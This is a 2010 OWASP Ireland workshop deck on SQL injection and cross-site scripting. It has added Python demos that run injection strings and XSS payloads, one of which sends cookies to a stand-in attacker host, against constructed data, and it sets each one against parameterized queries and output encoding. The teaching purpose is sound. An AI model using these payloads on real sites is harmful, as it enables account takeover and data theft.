1 Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
Practical advice for improving Application Security
Fabio Cerullo / Eoin Keary, OWASP Ireland (fcerullo@owasp.org, eoin.keary@owasp.org)
25th February 2010

2 Today’s Agenda
 Presentation: “Practical advice for improving Application Security”
 Introduction to OWASP and the OWASP Top Ten
 Demonstration video of typical web based attacks with high level explanation
 Live SQL injection demo using WebGoat & WebScarab
 Live Cross Site Scripting demo using WebGoat & WebScarab
 Coffee Break
 Presentation: “The problems we are faced with”
 The Application Security Verification Standard
 SDLC & Security Assurance Maturity Model
 Code Review versus traditional Runtime Testing
 Q&A

3 What is OWASP?
 Open Web Application Security Project
 Non-profit, volunteer driven organization
 All members are volunteers
 All work is donated by sponsors
 Provides free resources to the community
 Publications, Articles, Standards
 Testing and Training Software
 Local Chapters & Mailing Lists
 Supported through sponsorships
 Corporate support through financial or project sponsorship
 Personal sponsorships from members

4 What does OWASP provide?
 Publications
 OWASP Top 10
 OWASP Development Guide
 OWASP Testing Guide
 OWASP Code Review Guide
 OWASP Application Security Verification Standard
 etc.
 Software
 WebGoat
 WebScarab
 ESAPI
 Live CD
 etc.
 Local Chapters
 Community Orientation
 OWASP Irish Chapter (~180 mailing-list users)

5 OWASP Ireland RoadMap 2010
 New Board
 Fabio Cerullo – President (fcerullo@owasp.org)
 Information Security Specialist at AIB
 OWASP Global Education Committee
 OWASP Internationalization Promoter
 Eoin Keary – Vice President (eoin.keary@owasp.org)
 Senior Manager A&P/Risk at EY EMEIA
 OWASP Code Review Guide Lead
 OWASP Ireland Chapter Founder
 OWASP Global Board Member
 Rahim Jina – Secretary (rahim.jina@owasp.org)
 Security Consultant at EY EMEA
 OWASP Code Review Guide Reviewer
 OWASP SAMM Project Contributor

6 OWASP Ireland RoadMap 2010
 New Initiatives
 Engage with local industry (e.g. Sage Ireland, IISF)
 Engage with local universities (TCD, UCD, DCU)
 Monthly meet-ups to network among peers
 Call for Presentations 2010
 Call for Local Chapter/Meet-up Sponsors
 Invite international speakers
 OWASP AppSec Ireland
 International conference on 3rd September 2010 @ TCD
 Training/Presentation opportunities
 Sponsorship opportunities
 Web App CTF
 Irish Information Security Event
 Local conference around May 2010 (TBC)
 Joint effort between OWASP Ireland, ISSA, IISF, ISACA, IRISS

7 OWASP Top 10
 The goal of the Top 10 project is to raise awareness about application security.
 It lists the most critical web application security risks.
 The Top 10 provides basic methods to protect against these high-risk problem areas and gives guidance on where to go from there.
 Referenced by many standards, books, tools and organizations, including MITRE, PCI DSS, DISA, FTC and many more.
 The OWASP Top 10 was initially released in 2003 and updated in 2004, 2007 and 2010.

8 OWASP Top 10 2010 – Release Candidate: http://www.owasp.org/index.php/OWASP_Top_Ten_Project

9 Tools being used in this workshop
 OWASP WebScarab
 OWASP WebGoat
 OWASP Live CD

10 WebScarab
 WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols.
 It is written in Java, and is thus portable to many platforms.
 WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.

11 WebGoat
 WebGoat is a deliberately insecure J2EE web application maintained by OWASP, designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.

12 How does everything fit together?
Web Browser -> WebScarab (intercepting proxy, port 8008) -> WebGoat (port 80)
The browser is configured to use WebScarab as its HTTP proxy, so every request to WebGoat and every response from it passes through WebScarab, where it can be inspected and modified.

13 Injection Flaws

14 Injection Flaws
 Code injection is the exploitation of a bug caused by processing invalid data: user-supplied data ends up being parsed by an interpreter as part of the program’s own instructions.
 An attacker uses it to “inject” code into a program and change its course of execution.
 SQL injection is the most prevalent form found in the wild.
 Injection is not limited to SQL: web scripting languages, SOAP/XML, XPath, e-mail headers, LDAP queries and O/S command shells are all interpreters that can be targeted the same way.

15 Code Injection
 Any useful web application receives user data, manipulates it and hands it to an interpreter.
 The code processed by the interpreter is a mix of instructions written by the developer and user-supplied data.
 E.g. (query built by string concatenation): "SELECT * FROM USERS WHERE ACCOUNT='" + accountid + "'"
 An attacker can supply crafted input, e.g. accountid = ' OR '1'='1
 The interpreter then executes: SELECT * FROM USERS WHERE ACCOUNT='' OR '1'='1' – a condition that is true for every row, so the whole table is returned.

16 Types of SQL Injection
- First Order Attack: the attacker simply enters a malicious string and the modified code is executed immediately.
- Second Order Attack: the attacker injects into persistent storage (such as a table row), which the application later treats as a trusted source; the attack executes when another activity reads that stored data back into a query without parameters or escaping.

17 Injection Demo
 SQL INJECTION VIDEO

18 WebGoat Exercise: String SQL Injection

19 WebGoat Exercise: Numeric SQL Injection

20 Best Practices: How to avoid SQL Injection
 Constrain and sanitize input data. Check for known-good data by validating type, length, format and range.
 Use a database account with restricted permissions. Ideally, grant execute permission only on selected stored procedures and no direct table access. (A stored procedure that builds dynamic SQL from its arguments is still injectable, so the procedure itself must use parameters.)
 Avoid disclosing database error information. When a database error occurs, do not return detailed error messages to the user; log them server-side instead.

21 Best Practices: How to avoid SQL Injection
 Use parameterized queries (prepared statements) so that the query structure is fixed before user data is bound to it; this is the primary defence recommended by the OWASP SQL Injection Cheat Sheet.
 Use escape routines to handle special input characters only where parameters cannot be used (e.g. identifiers in dynamic SQL). Escape routines add an escape character to characters that have special meaning to the database engine (the slide’s example is SQL Server), thereby making them harmless; they are a last resort, not a substitute for parameters.
 Connection strings: encrypting connection strings and credentials in configuration files and protecting them with strict ACLs should be the norm.
 OWASP ESAPI (Validator, Encoder)
 OWASP SQL Injection Cheat Sheet

22 Injection Flaws: Knowledge Quiz
You have found a SQL injection vulnerability in a login function, and you try to use the input ' or 1=1-- to bypass the login. Your attack fails and the resulting error message indicates that the -- characters are being stripped by the application’s input filters. How could you circumvent this problem?

23 Injection Flaws: Knowledge Quiz
An easy way to achieve the same effect without using comment characters is with the input ' or 'a'='a
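The following is an added example, written for this page and not part of the original slides or of WebGoat. It reproduces the concatenated query from the Code Injection slide against a constructed in-memory SQLite table (the account ids, names and balances are made up), shows the second-order attack from the Types of SQL Injection slide, runs both quiz payloads through a filter that only strips `--`, and contrasts all of that with the parameterized query plus positive validation that the best-practice slides describe. The six-digit account-id format is an assumption for the validator.

```python
import re
import sqlite3

# Constructed sample rows for the demo; the slides show no data.
SAMPLE_USERS = [
    ("100001", "Alice", 1500),
    ("100002", "Bob", 320),
    ("100003", "Carol", 9800),
]

ACCOUNT_RE = re.compile(r"[0-9]{6}")  # assumed account-id format: six digits


def make_db():
    """In-memory SQLite table standing in for the application's USERS table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (account TEXT, name TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, accountid):
    """The slide's pattern: developer SQL glued to user data.
    Same shape as "SELECT * FROM USERS WHERE ACCOUNT='" + accountid + "'"."""
    sql = "SELECT account, name, balance FROM users WHERE account='" + accountid + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, accountid):
    """Parameterized query: the statement is parsed with a placeholder and the
    value is bound afterwards, so the interpreter never sees user data as SQL."""
    sql = "SELECT account, name, balance FROM users WHERE account=?"
    return conn.execute(sql, (accountid,)).fetchall()


def validate_accountid(accountid):
    """Positive (known-good) validation of type/length/format, as the best-practice
    slide asks for; used in front of the parameterized query, not instead of it."""
    if not isinstance(accountid, str) or not ACCOUNT_RE.fullmatch(accountid):
        raise ValueError("account id must be exactly six digits")
    return accountid


def lookup_hardened(conn, accountid):
    """Validation plus parameters: the combination the best-practice slides describe."""
    return lookup_parameterized(conn, validate_accountid(accountid))


def naive_filter(accountid):
    """The quiz's input filter: strips the SQL comment marker and nothing else."""
    return accountid.replace("--", "")


def quiz_payloads(conn):
    """Runs both quiz payloads through the filter and the vulnerable query.
    Returns {payload: row count} or {payload: 'error: ...'} when the SQL breaks."""
    outcome = {}
    for payload in ("' or 1=1--", "' or 'a'='a"):
        try:
            outcome[payload] = len(lookup_vulnerable(conn, naive_filter(payload)))
        except sqlite3.OperationalError as err:
            outcome[payload] = "error: " + str(err)
    return outcome


def second_order_vulnerable(conn):
    """Second-order injection: the attacker's value is stored safely with a
    parameterized INSERT, but a later activity trusts the stored row and
    concatenates it into a new query. Returns the accounts that query yields."""
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("100004", "x' OR '1'='1", 0))
    (name,) = conn.execute("SELECT name FROM users WHERE account=?", ("100004",)).fetchone()
    sql = "SELECT account FROM users WHERE name='" + name + "'"  # the bug is here
    return sorted(row[0] for row in conn.execute(sql).fetchall())


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:      ", lookup_vulnerable(db, "100001"))
    print("first-order attack: ", lookup_vulnerable(db, "' OR '1'='1"))
    print("parameterized:      ", lookup_parameterized(db, "' OR '1'='1"))
    print("quiz payloads:      ", quiz_payloads(db))
    print("second-order attack:", second_order_vulnerable(db))
```

Running the script shows the first-order payload returning every row from the concatenated query and no rows from the parameterized one, the comment-stripping filter turning `' or 1=1--` into a syntax error while `' or 'a'='a` still returns the whole table, and the second-order query returning all four accounts even though the malicious name was inserted with parameters. Escaping the name at insert time would not have helped either: the stored value is legitimate data, and the defect is the later concatenation.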

24 Cross Site Scripting (XSS)

25 XSS
 Cross-site scripting (XSS) is a vulnerability of dynamic web pages: information supplied to the web server is replayed as part of the response, and the browser executes it as script in the context of the vulnerable site.
 Can be used to steal session cookies, application data, etc.
 Two main types: Stored and Reflected XSS (DOM-based XSS, where the injection happens inside client-side script, is a third).
 Often discussed alongside: CSRF (a separate vulnerability class, which XSS can be used to amplify) and XST (cross-site tracing).

26 XSS Example

27 XSS Vulnerability
 Common weaknesses that make a web application susceptible to cross-site scripting attacks:
 Failing to constrain and validate input (the attacker’s data enters the application)
 Failing to encode output (the server’s response carries it as live markup)
 Trusting data retrieved from a shared database (another application may have stored it unencoded)
 Typical scenario:
 Attacker provides malicious user input (e.g. a crafted link/URL)
 Website includes it in the response to the user (why not? it “trusts” its own data)
 User’s browser executes the malicious script unknowingly.

28 XSS Types
 Stored XSS: malicious input is stored on the site and displayed to other users at some later time.

29 WebGoat Exercise: Stored XSS

30 XSS Types
 Reflected XSS: malicious input is immediately sent back to the user who submitted it.
 Attacker crafts an e-mail (or website) containing a malicious link to the vulnerable site.
 Victim reads the mail / visits the website and follows the link, unknowingly sending the script to the vulnerable site.
 Vulnerable site takes the script and generates a page containing it.
 Victim’s browser executes the script and discloses information (e.g. the session cookie) to the attacker.

31 WebGoat Exercise: Reflected XSS

32 XSS Real World Example (May 2009)
 McAfee site is vulnerable to XSS
 Researcher publishes paper on how to exploit the vulnerability
 NYTimes copy-pastes the research paper (including source code)
 NYTimes is now vulnerable to XSS

33 WebGoat Exercise: Phishing with XSS

34 XSS Demo
 BEEF FRAMEWORK VIDEO

35 XSS Best Practices
 Positive input validation
 HttpOnly cookie option: Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly (stops script from reading the cookie via document.cookie; it limits cookie theft but does not stop the injected script from running)
 Anti-XSS tools for .NET/Java: AntiXSSLibrary.HtmlEncode(string), AntiXSSLibrary.URLEncode(string)
 Output encoding, chosen for the context the data lands in (HTML body, attribute value, URL, JavaScript)
 OWASP ESAPI (Validator, Encoder)
 OWASP XSS Cheat Sheet
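The following is an added example, written for this page and not part of the original slides, WebGoat or the AntiXSS library. It covers the reflected and stored cases from the XSS Types slides and the output-encoding advice on the best-practices slide: the same constructed attacker payloads (made up for the demo) are rendered into an HTML body, an attribute value, a URL and a stored guest book, once by concatenation and once with context-appropriate encoding, and a small HTML parser then reports what a browser would actually execute. Python’s `html.escape` and `urllib.parse.quote` stand in for HtmlEncode and URLEncode; the page markup and names are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed attacker inputs for the demo; the slides show no payloads.
SCRIPT_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def search_page_vulnerable(query):
    """Reflected XSS: the query is echoed straight back into the HTML body."""
    return "<p>Results for: " + query + "</p>"


def search_page_encoded(query):
    """HTML-body context: HtmlEncode turns < > & \" ' into entities."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def search_box_vulnerable(query):
    """Attribute context: a stray quote closes value="" and adds an event handler."""
    return '<input name="q" value="' + query + '">'


def search_box_encoded(query):
    """Same output, but quotes are encoded so the value cannot leave its attribute."""
    return '<input name="q" value="' + html.escape(query, quote=True) + '">'


def profile_link(username):
    """URL context: URLEncode the parameter first, then HtmlEncode the attribute
    and the link text, each encoder matching the context the data lands in."""
    href = "/profile?user=" + quote(username, safe="")
    return ('<a href="' + html.escape(href, quote=True) + '">'
            + html.escape(username, quote=True) + "</a>")


class GuestBook:
    """Stored XSS: entries are kept verbatim; whether the browser sees markup
    or text is decided at render time, which is where the encoding belongs."""

    def __init__(self):
        self.entries = []

    def post(self, author, message):
        self.entries.append((author, message))

    def render_vulnerable(self):
        return "".join("<li><b>%s</b>: %s</li>" % (a, m) for a, m in self.entries)

    def render_encoded(self):
        return "".join(
            "<li><b>%s</b>: %s</li>" % (html.escape(a, quote=True), html.escape(m, quote=True))
            for a, m in self.entries
        )


class ActiveContentFinder(HTMLParser):
    """Parses the rendered page the way a browser would and records script
    elements and on* event-handler attributes, i.e. what would actually run."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append("event handler " + name)


def active_content(page):
    """Returns the list of executable things found in a rendered page ([] is clean)."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for label, page in [
        ("reflected, vulnerable", search_page_vulnerable(SCRIPT_PAYLOAD)),
        ("reflected, encoded", search_page_encoded(SCRIPT_PAYLOAD)),
        ("attribute, vulnerable", search_box_vulnerable(ATTR_PAYLOAD)),
        ("attribute, encoded", search_box_encoded(ATTR_PAYLOAD)),
    ]:
        print("%-22s %-30s %s" % (label, active_content(page), page))
    book = GuestBook()
    book.post("mallory", SCRIPT_PAYLOAD)
    print("stored, vulnerable   ", active_content(book.render_vulnerable()))
    print("stored, encoded      ", active_content(book.render_encoded()))
    print(profile_link("a&b<c"))
```

Two points the slide bullets do not spell out follow from running this. The attribute payload contains no `<script>` at all, so a filter or a simple substring check aimed at script tags passes it; only encoding the quote keeps the input inside the attribute. And the guest book stores the payload unchanged in both variants: encoding on the way in would corrupt the data and still leave the vulnerable renderer vulnerable, so the encoding is applied where the data meets the interpreter, the rendered HTML.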

36 XSS: Knowledge Quiz
You are testing a web mail application that handles file attachments and displays them in the browser. What common vulnerability should you immediately check for?

37 XSS: Knowledge Quiz
If the application displays HTML or text files without any sanitization, then JavaScript contained within them will execute in the browser of any user who opens the attachment, inside the web mail application’s origin. Check how attachments are served: rendering user-supplied HTML inline is stored XSS; serving attachments with Content-Disposition: attachment and an accurate Content-Type, or from a separate domain, keeps them out of the application’s origin.

38 Thank you!